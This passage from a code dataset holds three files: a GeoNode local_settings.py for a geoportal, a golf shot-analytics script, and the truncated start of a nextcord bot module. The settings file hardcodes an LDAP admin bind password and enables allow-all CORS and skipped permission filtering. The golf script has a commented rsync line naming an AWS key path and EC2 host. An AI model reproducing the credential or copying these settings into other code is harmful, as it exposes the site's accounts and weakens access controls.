GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'geoext' # DEPRECATED use HOOKSET instead\nGEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.GeoExtHookSet\"\n\n# To enable the REACT based Client enable those\n# INSTALLED_APPS += ('geonode-client', )\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'react' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.ReactHookSet\"\n\n# To enable the Leaflet based Client enable those\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'leaflet' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.LeafletHookSet\"\n\n# To enable the MapStore2 based Client enable those\n# INSTALLED_APPS += ('geonode_mapstore_client', )\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'mapstore' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode_mapstore_client.hooksets.MapStoreHookSet\"\n\n# LEAFLET_CONFIG = {\n# 'TILES': [\n# # Find tiles at:\n# # http://leaflet-extras.github.io/leaflet-providers/preview/\n#\n# # Map Quest\n# ('Map Quest',\n# 'http://otile4.mqcdn.com/tiles/1.0.0/osm/{z}/{x}/{y}.png',\n# 'Tiles Courtesy of MapQuest '\n# '— Map data © '\n# 'OpenStreetMap'),\n# # Stamen toner lite.\n# # ('Watercolor',\n# # 'http://{s}.tile.stamen.com/watercolor/{z}/{x}/{y}.png',\n# # 'Map tiles by Stamen Design, \\\n# # CC BY 3.0 — Map data © \\\n# # OpenStreetMap contributors, \\\n# # CC-BY-SA'),\n# # ('Toner Lite',\n# # 'http://{s}.tile.stamen.com/toner-lite/{z}/{x}/{y}.png',\n# # 'Map tiles by Stamen Design, \\\n# # CC BY 3.0 — Map data © \\\n# # OpenStreetMap contributors, \\\n# # CC-BY-SA'),\n# ],\n# 'PLUGINS': {\n# 'esri-leaflet': {\n# 'js': 'lib/js/esri-leaflet.js',\n# 'auto-include': True,\n# },\n# 'leaflet-fullscreen': {\n# 'css': 'lib/css/leaflet.fullscreen.css',\n# 'js': 'lib/js/Leaflet.fullscreen.min.js',\n# 'auto-include': True,\n# },\n# },\n# 'SRID': 3857,\n# 'RESET_VIEW': False\n# }\n\nALT_OSM_BASEMAPS = ast.literal_eval(os.environ.get('ALT_OSM_BASEMAPS', 'False'))\nCARTODB_BASEMAPS = ast.literal_eval(os.environ.get('CARTODB_BASEMAPS', 'False'))\nSTAMEN_BASEMAPS = ast.literal_eval(os.environ.get('STAMEN_BASEMAPS', 'False'))\nTHUNDERFOREST_BASEMAPS = ast.literal_eval(os.environ.get('THUNDERFOREST_BASEMAPS', 'False'))\n#MAPBOX_ACCESS_TOKEN = os.environ.get('MAPBOX_ACCESS_TOKEN', None)\n#BING_API_KEY = os.environ.get('BING_API_KEY', None)\n#GOOGLE_API_KEY = os.environ.get('GOOGLE_API_KEY', None)\n\n#MAP_BASELAYERS = [{\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer\",\n# \"args\": [\"No background\"],\n# \"name\": 
\"background\",\n# \"visibility\": False,\n# \"fixed\": True,\n# \"group\":\"background\"\n#},\n # {\n # \"source\": {\"ptype\": \"gxp_olsource\"},\n # \"type\": \"OpenLayers.Layer.XYZ\",\n # \"title\": \"TEST TILE\",\n # \"args\": [\"TEST_TILE\", \"http://test_tiles/tiles/${z}/${x}/${y}.png\"],\n # \"name\": \"background\",\n # \"attribution\": \"© TEST TILE\",\n # \"visibility\": False,\n # \"fixed\": True,\n # \"group\":\"background\"\n # },\n# {\n# \"source\": {\"ptype\": \"gxp_osmsource\"},\n# \"type\": \"OpenLayers.Layer.OSM\",\n# \"name\": \"mapnik\",\n# \"visibility\": True,\n# \"fixed\": True,\n# \"group\": \"background\"\n#}]\n\nMAP_BASELAYERS = [{\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer\",\n \"args\": [\"No background\"],\n \"name\": \"background\",\n \"visibility\": False,\n \"scales\":[100000,50000,20000],\n \"fixed\": True,\n \"group\":\"background\"\n}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"UNESCO\",\n# \"args\": [\"UNESCO\", \"http://en.unesco.org/tiles/${z}/${x}/${y}.png\"],\n# \"wrapDateLine\": True,\n# \"name\": \"background\",\n# \"attribution\": \"© UNESCO\",\n# \"visibility\": False,\n# \"scales\":[100000,50000,20000],\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"UNESCO GEODATA\",\n# \"args\": [\"UNESCO GEODATA\", \"http://en.unesco.org/tiles/geodata/${z}/${x}/${y}.png\"],\n# \"name\": \"background\",\n# \"attribution\": \"© UNESCO\",\n# \"visibility\": False,\n# \"scales\":[100000,50000,20000],\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"ESRI\",\n# \"args\": [\"ESRI\", \"https://server.arcgisonline.com/ArcGIS/rest/services/World_Topo_Map/MapServer/tile/{z}/{y}/{x}\"],\n# \"name\": \"background\",\n# \"attribution\": \"© ESRI\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"Humanitarian OpenStreetMap\",\n# \"args\": [\"Humanitarian OpenStreetMap\", \"http://a.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\"],\n# \"name\": \"background\",\n# \"attribution\": \"© OpenStreetMap, Tiles courtesy of Humanitarian OpenStreetMap Team\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n# }, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"MapBox Satellite Streets\",\n# \"args\": [\"MapBox Satellite Streets\", \"http://api.mapbox.com/styles/v1/mapbox/satellite-streets-v9/tiles/${z}/${x}/${y}?access_token=\"+MAPBOX_ACCESS_TOKEN],\n# \"name\": \"background\",\n# \"attribution\": \"© Mapbox © OpenStreetMap Improve this map\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"MapBox Streets\",\n# \"args\": [\"MapBox Streets\", \"http://api.mapbox.com/styles/v1/mapbox/streets-v9/tiles/${z}/${x}/${y}?access_token=\"+MAPBOX_ACCESS_TOKEN],\n# \"name\": \"background\",\n# \"attribution\": \"© Mapbox © OpenStreetMap Improve this map\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# 
\"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_osmsource\"},\n# \"type\": \"OpenLayers.Layer.OSM\",\n# \"title\": \"OpenStreetMap\",\n# \"name\": \"mapnik\",\n# \"attribution\": \"© OpenStreetMap contributors\",\n# \"visibility\": True,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\": \"background\"\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.XYZ\",\n \"title\": \"ESRI Hydro\",\n \"args\": [\"ESRI Hydro\", \"https://server.arcgisonline.com/ArcGIS/rest/services/Ocean_Basemap/MapServer/tile/${z}/${y}/${x}\"],\n \"name\": \"background\",\n \"attribution\": \"© ESRI\",\n \"visibility\": False,\n \"wrapDateLine\": True,\n \"scales\":[100000,50000,20000],\n \"fixed\": True,\n \"group\":\"background\"\n}, {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.XYZ\",\n \"title\": \"ESRI Satellite\",\n \"args\": [\"ESRI Satellite\", \"https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/${z}/${y}/${x}\"],\n \"name\": \"background\",\n \"attribution\": \"© ESRI\",\n \"visibility\": False,\n \"wrapDateLine\": True,\n \"scales\":[100000,50000,20000],\n \"fixed\": True,\n \"group\":\"background\"\n}, {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.XYZ\",\n \"title\": \"ESRI Topo\",\n \"args\": [\"ESRI Topo\", \"https://server.arcgisonline.com/ArcGIS/rest/services/World_Street_Map/MapServer/tile/${z}/${y}/${x}\"],\n \"name\": \"background\",\n \"attribution\": \"© ESRI\",\n \"visibility\": True,\n \"scales\":[100000,50000,20000],\n \"wrapDateLine\": True,\n \"fixed\": True,\n \"group\":\"background\"\n}]\n\nif 'geonode.geoserver' in INSTALLED_APPS:\n LOCAL_GEOSERVER = {\n \"source\": {\n \"ptype\": \"gxp_wmscsource\",\n \"url\": OGC_SERVER['default']['PUBLIC_LOCATION'] + \"wms\",\n \"restUrl\": \"/gs/rest\"\n }\n }\n baselayers = MAP_BASELAYERS\n MAP_BASELAYERS = [LOCAL_GEOSERVER]\n MAP_BASELAYERS.extend(baselayers)\n\n# To enable the REACT based Client enable those\n# INSTALLED_APPS += ('geonode-client', )\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'react' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.ReactHookSet\"\n\n# To enable the Leaflet based Client enable those\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'leaflet' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.LeafletHookSet\"\n\n# To enable the MapLoom based Client enable those\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'maploom' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.MaploomHookSet\"\n#\n# CORS_ORIGIN_WHITELIST = (\n# HOSTNAME\n# )\n\n# To enable the MapStore2 based Client enable those\n# if 'geonode_mapstore_client' not in INSTALLED_APPS:\n# INSTALLED_APPS += (\n# 'mapstore2_adapter',\n# 'geonode_mapstore_client',)\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'mapstore' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode_mapstore_client.hooksets.MapStoreHookSet\"\n# MAPSTORE_DEBUG = False\n\n\n\nif 'geonode.geoserver' in INSTALLED_APPS:\n LOCAL_GEOSERVER = {\n \"type\": \"wms\",\n \"url\": OGC_SERVER['default']['PUBLIC_LOCATION'] + \"wms\",\n \"visibility\": True,\n \"title\": \"Local GeoServer\",\n \"group\": \"background\",\n \"format\": \"image/png8\",\n \"restUrl\": \"/gs/rest\"\n }\n # baselayers = MAPSTORE_BASELAYERS\n # MAPSTORE_BASELAYERS = [LOCAL_GEOSERVER]\n # MAPSTORE_BASELAYERS.extend(baselayers)\n\n# Use kombu broker by default\n# REDIS_URL = 
'redis://localhost:6379/1'\n# BROKER_URL = REDIS_URL\n# CELERY_RESULT_BACKEND = REDIS_URL\nCELERYD_HIJACK_ROOT_LOGGER = True\nCELERYD_CONCURENCY = 1\n# Set this to False to run real async tasks\nCELERY_ALWAYS_EAGER = True\nCELERYD_LOG_FILE = None\nCELERY_REDIRECT_STDOUTS = True\nCELERYD_LOG_LEVEL = 1\n\n# Haystack Search Backend Configuration. To enable,\n# first install the following:\n# - pip install django-haystack\n# - pip install elasticsearch==2.4.0\n# - pip install woosh\n# - pip install pyelasticsearch\n# Set HAYSTACK_SEARCH to True\n# Run \"python manage.py rebuild_index\"\n# HAYSTACK_SEARCH = False\n# Avoid permissions prefiltering\nSKIP_PERMS_FILTER = True\n# Update facet counts from Haystack\nHAYSTACK_FACET_COUNTS = True\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.elasticsearch2_backend.Elasticsearch2SearchEngine',\n 'URL': 'http://127.0.0.1:9200/',\n 'INDEX_NAME': 'haystack',\n },\n # 'db': {\n # 'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',\n # 'EXCLUDED_INDEXES': ['thirdpartyapp.search_indexes.BarIndex'],\n # }\n}\nHAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'\n# HAYSTACK_SEARCH_RESULTS_PER_PAGE = 20\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d '\n '%(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(message)s',\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler',\n }\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"geonode\": {\n \"handlers\": [\"console\"], \"level\": \"INFO\", },\n \"geonode.qgis_server\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"gsconfig.catalog\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"owslib\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"pycsw\": {\n \"handlers\": [\"console\"], \"level\": \"INFO\", },\n \"celery\": {\n 'handlers': [\"console\"], 'level': 'ERROR', },\n },\n}\n\n# Additional settings\nCORS_ORIGIN_ALLOW_ALL = True\n\nGEOIP_PATH = \"/usr/local/share/GeoIP\"\n\n# add following lines to your local settings to enable monitoring\nMONITORING_ENABLED = False\n\nif MONITORING_ENABLED:\n if 'geonode.contrib.monitoring' not in INSTALLED_APPS:\n INSTALLED_APPS += ('geonode.contrib.monitoring',)\n if 'geonode.contrib.monitoring.middleware.MonitoringMiddleware' not in MIDDLEWARE_CLASSES:\n MIDDLEWARE_CLASSES += \\\n ('geonode.contrib.monitoring.middleware.MonitoringMiddleware',)\n MONITORING_CONFIG = None\n MONITORING_HOST_NAME = os.getenv(\"MONITORING_HOST_NAME\", HOSTNAME)\n MONITORING_SERVICE_NAME = 'geonode'\n\n#Define email service on GeoNode\nEMAIL_ENABLE = False\n\nif EMAIL_ENABLE:\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_HOST = 'localhost'\n EMAIL_PORT = 25\n EMAIL_HOST_USER = ''\n EMAIL_HOST_PASSWORD = ''\n EMAIL_USE_TLS = False\n DEFAULT_FROM_EMAIL = 'Example.com '\n\n# Documents Thumbnails\nUNOCONV_ENABLE = True\n\nif UNOCONV_ENABLE:\n UNOCONV_EXECUTABLE = os.getenv('UNOCONV_EXECUTABLE', '/usr/bin/unoconv')\n UNOCONV_TIMEOUT = os.getenv('UNOCONV_TIMEOUT', 30) # seconds\n\n# Advanced Security Workflow 
Settings\nACCOUNT_APPROVAL_REQUIRED = False\nCLIENT_RESULTS_LIMIT = 20\nAPI_LIMIT_PER_PAGE = 1000\nFREETEXT_KEYWORDS_READONLY = False\nRESOURCE_PUBLISHING = False\nADMIN_MODERATE_UPLOADS = False\nGROUP_PRIVATE_RESOURCES = False\nGROUP_MANDATORY_RESOURCES = False\nMODIFY_TOPICCATEGORY = True\nUSER_MESSAGES_ALLOW_MULTIPLE_RECIPIENTS = True\nDISPLAY_WMS_LINKS = True\nREGISTRATION_OPEN = False\n# For more information on available settings please consult the Django docs at\n# https://docs.djangoproject.com/en/dev/ref/settings\n# ######################################################################### #\n# account registration settings\nACCOUNT_OPEN_SIGNUP = False\nACCOUNT_APPROVAL_REQUIRED = False\nACCOUNT_EMAIL_CONFIRMATION_EMAIL = False\nACCOUNT_EMAIL_CONFIRMATION_REQUIRED = False\n\n# notification settings\nNOTIFICATION_ENABLED = False\nNOTIFICATION_LANGUAGE_MODULE = \"account.Account\"\n\n# Queue non-blocking notifications.\nNOTIFICATION_QUEUE_ALL = False\n\n# pinax.notifications\n# or notification\nNOTIFICATIONS_MODULE = 'pinax.notifications'\n\n#if NOTIFICATION_ENABLED:\n # INSTALLED_APPS += (NOTIFICATIONS_MODULE, )\n\n\n\n\n\nimport ldap\nfrom django_auth_ldap.config import LDAPSearch,GroupOfNamesType, PosixGroupType,NestedGroupOfNamesType\n\nAUTHENTICATION_BACKENDS = (\n # 'oauth2_provider.backends.OAuth2Backend',\n# 'django_auth_ldap.backend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n 'guardian.backends.ObjectPermissionBackend',\n 'django_cas_ng.backends.CASBackend',\n\t # 'allauth.account.auth_backends.AuthenticationBackend'\n)\n\nCAS_SERVER_URL='http://service.ermis-f.eu/'\nCAS_VERSION= '3'\nCAS_LOGOUT_COMPLETELY= True\nCAS_APPLY_ATTRIBUTES_TO_USER = True\nCAS_REDIRECT_URL='https://geoportal.ermis-f.eu'\nCAS_RENAME_ATTRIBUTES = {'first_name': 'first_name','last_name':'last_name', 'organization':'organization'}\n\nSESSION_COOKIE_AGE = 36000\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\n\n\nAUTH_LDAP_SERVER_URI = 'ldap://geoportal.ermis-f.eu:389'\nLDAP_SEARCH_DN = 'cn=users,dc=geoportal,dc=ermis-f,dc=eu'\nAUTH_LDAP_USER = '(uid=%(user)s)'\nAUTH_LDAP_BIND_DN = 'cn=admin,dc=geoportal,dc=ermis-f,dc=eu'\nAUTH_LDAP_BIND_PASSWORD = 'Erm_F2018'\n\t#AUTH_LDAP_BIND_DN = ''\n\t#AUTH_LDAP_BIND_PASSWORD = ''\nAUTH_LDAP_USER_ATTR_MAP = {\n 'first_name': 'first_name','last_name':'last_name','email':'Email'\n}\nAUTH_LDAP_USER_SEARCH = LDAPSearch(LDAP_SEARCH_DN,\n ldap.SCOPE_SUBTREE, AUTH_LDAP_USER)\n\nAUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n 'ou=geonode,dc=geoportal,dc=ermis-f,dc=eu',\n ldap.SCOPE_SUBTREE,\n '(objectClass=groupOfNames)',\n)\nAUTH_LDAP_GROUP_TYPE = NestedGroupOfNamesType()\n\t#AUTH_LDAP_REQUIRE_GROUP = \"ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\"\n\nAUTH_LDAP_MIRROR_GROUPS=True\nAUTH_LDAP_ALWAYS_UPDATE_USER=True\nAUTH_LDAP_AUTHORIZE_ALL_USERS=True\n\nAUTH_LDAP_USER_FLAGS_BY_GROUP = {\n \"is_active\": \"cn=active,ou=geonode,dc=geoportal,dc=ermis-f,dc=eu\",\n \"is_staff\": \"cn=staff,ou=geonode,dc=geoportal,dc=ermis-f,dc=eu\",\n \"is_superuser\": \"cn=superuser,ou=geonode,dc=geoportal,dc=ermis-f,dc=eu\",\n}\n\nAUTH_LDAP_FIND_GROUP_PERMS = True\nAUTH_LDAP_CONNECTION_OPTIONS = {\nldap.OPT_DEBUG_LEVEL: 3,\nldap.OPT_REFERRALS: 0,\n}\n\n\n\n\n\n#AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n# 'ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr',\n# ldap.SCOPE_SUBTREE,\n# '(objectClass=groupOfNames)',\n#)\n#AUTH_LDAP_GROUP_TYPE = NestedGroupOfNamesType()\n#AUTH_LDAP_REQUIRE_GROUP = 
\"ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\"\n\n#AUTH_LDAP_MIRROR_GROUPS=True\n#AUTH_LDAP_ALWAYS_UPDATE_USER=True\n#AUTH_LDAP_AUTHORIZE_ALL_USERS=True\n#\n#AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n# \"is_active\": \"cn=active,ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\",\n# \"is_staff\": \"cn=staff,ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\",\n# \"is_superuser\": \"cn=superuser,ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\",\n#}\n\n#AUTH_LDAP_FIND_GROUP_PERMS = True\n#AUTH_LDAP_CONNECTION_OPTIONS = {\n#ldap.OPT_DEBUG_LEVEL: 3,\n#ldap.OPT_REFERRALS: 0,\n#}\n","sub_path":"ermis/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":28563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"218618192","text":"import pandas as pd\nimport numpy as np\nfrom scipy.sparse import csc_matrix\nfrom scipy.spatial.distance import pdist,squareform\nimport math,os,sys,multiprocessing,gc,pickle,itertools\nfrom collections import defaultdict\n \ncols = ('Cat','Year','Round','Permanent_Tournament_#','Course_#','Hole','Start_X_Coordinate','tourn_num',\n 'Start_Y_Coordinate','Distance_from_hole','Strokes_Gained','Time','Par_Value','Player_#',\n 'Player_Last_Name','Player_First_Name')\ndata = pd.concat([pd.read_csv('../GolfData/Shot/%d.csv.gz' % year,usecols=cols) for year in range(2003,2019)])\nlen_before = len(data)\ndata = data.dropna(subset=['Strokes_Gained'])\nprint('Dropped %d shots for missing strokes gained.' % (len_before-len(data),))\n\ne_d,e_t,w_d,p_mult = .8,.7,.8,1.9\n\ncats = {}\ncats['green0'] = 'Cat==\"Green\" & Distance_from_hole<5'\ncats['fringe0'] = 'Cat==\"Fringe\" & Distance_from_hole<5'\ncats['green5'] = 'Cat==\"Green\" & Distance_from_hole>=5 & Distance_from_hole<10'\ncats['fringe5'] = 'Cat==\"Fringe\" & Distance_from_hole>=5 & Distance_from_hole<10'\ncats['green10'] = 'Cat==\"Green\" & Distance_from_hole>=10 & Distance_from_hole<20'\ncats['fringe10'] = 'Cat==\"Fringe\" & Distance_from_hole>=10 & Distance_from_hole<20'\ncats['green20'] = 'Cat==\"Green\" & Distance_from_hole>=20'\ncats['fringe20'] = 'Cat==\"Fringe\" & Distance_from_hole>=20'\ncats['prough0'] = 'Cat==\"Primary Rough\" & Distance_from_hole<90'\ncats['irough0'] = 'Cat==\"Intermediate Rough\" & Distance_from_hole<90'\ncats['prough90'] = 'Cat==\"Primary Rough\" & Distance_from_hole>=90 & Distance_from_hole<375'\ncats['irough90'] = 'Cat==\"Intermediate Rough\" & Distance_from_hole>=90 & Distance_from_hole<375'\ncats['prough375'] = 'Cat==\"Primary Rough\" & Distance_from_hole>=375'\ncats['irough375'] = 'Cat==\"Intermediate Rough\" & Distance_from_hole>=375'\ncats['fairway0'] = 'Cat==\"Fairway\" & Distance_from_hole<300'\ncats['fairway300'] = 'Cat==\"Fairway\" & Distance_from_hole>=300 & Distance_from_hole<540'\ncats['fairway540'] = 'Cat==\"Fairway\" & Distance_from_hole>=540'\ncats['bunker'] = 'Cat==\"Bunker\"'\ncats['tee3'] = 'Cat==\"Tee Box\" & Par_Value==3'\ncats['tee45'] = 'Cat==\"Tee Box\" & (Par_Value==4 | Par_Value==5)'\ncats['other'] = 'Cat==\"Other\"'\n\nmeta_cats = {}\nmeta_cats['tee3'] = ['tee3']\nmeta_cats['tee45'] = ['tee45']\nmeta_cats['green0'] = ['green0','fringe0']\nmeta_cats['green5'] = ['green5','fringe5']\nmeta_cats['green10'] = ['green10','fringe10']\nmeta_cats['green20'] = ['green20','fringe20']\nmeta_cats['rough0'] = ['prough0','irough0']\nmeta_cats['rough90'] = ['prough90','irough90']\nmeta_cats['rough375'] = ['prough375','irough375']\nmeta_cats['fairway0'] = ['fairway0']\nmeta_cats['fairway300'] = 
['fairway300']\nmeta_cats['fairway540'] = ['fairway540']\nmeta_cats['bunker'] = ['bunker']\nmeta_cats['other'] = ['other']\n\np_map = {mini_cat:(p_mult/data.query(cats[mini_cat])['Strokes_Gained'].std()\n if not np.isnan(data.query(cats[mini_cat])['Strokes_Gained'].std()) else 3.)\n for mini_cat in cats}\n\nprint(p_map)\n\ndef partition (lst, n):\n return [lst[i::n] for i in range(n)]\n\ndef run_a_slice(slice):\n def sigmoid(x,sig_p):\n m,r = sig_p, sig_p/10.\n return (1./(1. + np.exp(m)**(-x)) + (np.tanh(r*x) + 1.)/2.)/2.\n\n def get_matrix(tournament,condition,sig_p):\n arr,arr1 = np.zeros((n_players,n_players)),np.zeros((n_players,n_players))\n for (round,course,hole),df in data[data.tourn_num==tournament].groupby(['Round','Course_#','Hole']):\n subset = df.query(condition)[['Start_X_Coordinate','Start_Y_Coordinate','Distance_from_hole',\n 'Strokes_Gained','Time','Player_Index']].values\n num_shots = subset.shape[0]\n dists = squareform(pdist(subset[:,0:2]))\n w_1 = 1/(dists/(np.add.outer(subset[:,2],subset[:,2])/2) + .01)**e_d\n w_2 = 1/((np.abs(np.subtract.outer(subset[:,4],subset[:,4]))+5)/100.0)**e_t\n w = w_1*w_d + w_2*(1-w_d)\n np.fill_diagonal(w,0)\n w = np.squeeze(w.reshape(-1,1))\n vals = sigmoid(np.subtract.outer(subset[:,3],subset[:,3]),10.)\n np.fill_diagonal(vals,0)\n vals = np.squeeze(vals.reshape(-1,1))\n inds = (np.repeat(subset[:,5],num_shots).astype(int),\n np.tile(subset[:,5],num_shots).astype(int))\n np.add.at(arr,inds,w*vals)\n np.add.at(arr1,inds,w*.5)\n mat,mat1 = csc_matrix(arr),csc_matrix(arr1)\n return (mat,mat1)\n\n def save_sparse_csc(filename,array):\n np.savez(filename,data=array.data,indices=array.indices,indptr=array.indptr,shape=array.shape)\n return\n\n for tournament in slice:\n print(tournament)\n #tournament += run_a_slice.base_number_tournaments ## for incremental\n for big_cat in meta_cats:\n # if os.path.exists('cats/cats_w-%g-%g-%g/%s_%d.npz' % (e_d,e_t,w_d,big_cat,tournament)):\n # continue\n mat,mat1 = None,None\n for small_cat in meta_cats[big_cat]:\n sig_p = p_map[small_cat]\n condition = cats[small_cat] \n try:\n mat.data\n except:\n mat,mat1 = get_matrix(tournament,condition,sig_p)\n gc.collect()\n else:\n res = get_matrix(tournament,condition,sig_p)\n gc.collect()\n mat += res[0]\n mat1 += res[1]\n save_sparse_csc('cats/cats_w-%g-%g-%g/%s_%d' % (e_d,e_t,w_d,big_cat,tournament),mat)\n save_sparse_csc('cats/cats_w-%g-%g-%g/%s_%d_g' % (e_d,e_t,w_d,big_cat,tournament),mat1)\n #cmd = \"rsync -avL --progress -e \\\"ssh -i /home/ubuntu/aws_ds8key.pem\\\" /home/ubuntu/project/Rank_a_Golfer/cats/cats_w%g-%g-%g-%g ubuntu@ec2-54-162-31-22.compute-1.amazonaws.com:~/project/Rank_a_Golfer/cats/\" % (epsilon*100,e_d,e_t,w_d)\n #os.system(cmd)\n return\n\nif not os.path.exists('cats/cats_w-%s-%s-%s' % (e_d,e_t,w_d)):\n os.makedirs('cats/cats_w-%s-%s-%s' % (e_d,e_t,w_d))\ne_d,e_t,w_d = tuple(map(float,[e_d,e_t,w_d]))\n\nwith open('PickleFiles/num_to_ind_shot.pkl','rb') as pickle_file:\n num_to_ind = pickle.load(pickle_file,encoding='latin1')\n\nfor player_num in data['Player_#'].drop_duplicates():\n if player_num not in num_to_ind:\n num_to_ind[player_num] = len(num_to_ind)\n\nwith open('PickleFiles/num_to_ind_shot.pkl','wb') as pickle_file:\n pickle.dump(num_to_ind,pickle_file)\n\ndata.insert(5,'Player_Index',[num_to_ind[num] for num in data['Player_#']])\nname_to_ind = {}\nfor tup in data[['Player_Last_Name','Player_First_Name','Player_Index']].values:\n if tuple(tup[0:2]) in name_to_ind:\n if name_to_ind[tuple(tup[0:2])]!=tup[2]:\n for counter in 
range(10):\n key = tuple([tup[0],tup[1]+''.join(['*' for _ in range(counter)])])\n if key in name_to_ind and name_to_ind[key]==tup[2]:\n break\n else:\n for counter in range(10):\n key = tuple([tup[0],tup[1]+''.join(['*' for _ in range(counter)])])\n if key not in name_to_ind:\n break\n print(tuple(tup[0:2]),'is duped, inserting', key)\n print(name_to_ind[tuple(tup[0:2])],tup[2])\n name_to_ind[key] = tup[2]\n else:\n name_to_ind[tuple(tup[0:2])] = tup[2]\nwith open('PickleFiles/name_to_ind_shot.pkl','wb') as pickle_file:\n pickle.dump(name_to_ind,pickle_file,protocol=2)\nn_players = len(num_to_ind)\nprint(n_players)\ndata.Time = data.Time.values/100 * 60 + data.Time.values%100\n\nn_tournaments = len(pd.unique(data.tourn_num))\n\n#num_cores = multiprocessing.cpu_count()-2\nnum_cores = 3\nslices = partition(range(n_tournaments),num_cores)\npool = multiprocessing.Pool(num_cores)\nresults = pool.map(run_a_slice, slices)\npool.close()\n\n","sub_path":"save_blocks.py","file_name":"save_blocks.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"187342602","text":"import asyncio\nimport contextlib\nimport json\nimport logging\nimport sys\nfrom io import StringIO\nfrom typing import Generator, Optional, cast\n\nimport nextcord\nfrom nextcord.ext import commands\n\nfrom ..classes.converters import Required\nfrom ..classes.embed import Embed, PaginationEmbed\nfrom ..helpers.constants import ICONS\nfrom ..helpers.log import Log\nfrom ..helpers.utils import convert_to_seconds, shell_exec\n\nlog = cast(Log, logging.getLogger(__name__))\n\n\n@contextlib.contextmanager\ndef stdout_io() -> Generator[StringIO, None, None]:\n old = sys.stdout\n stdout = StringIO()\n 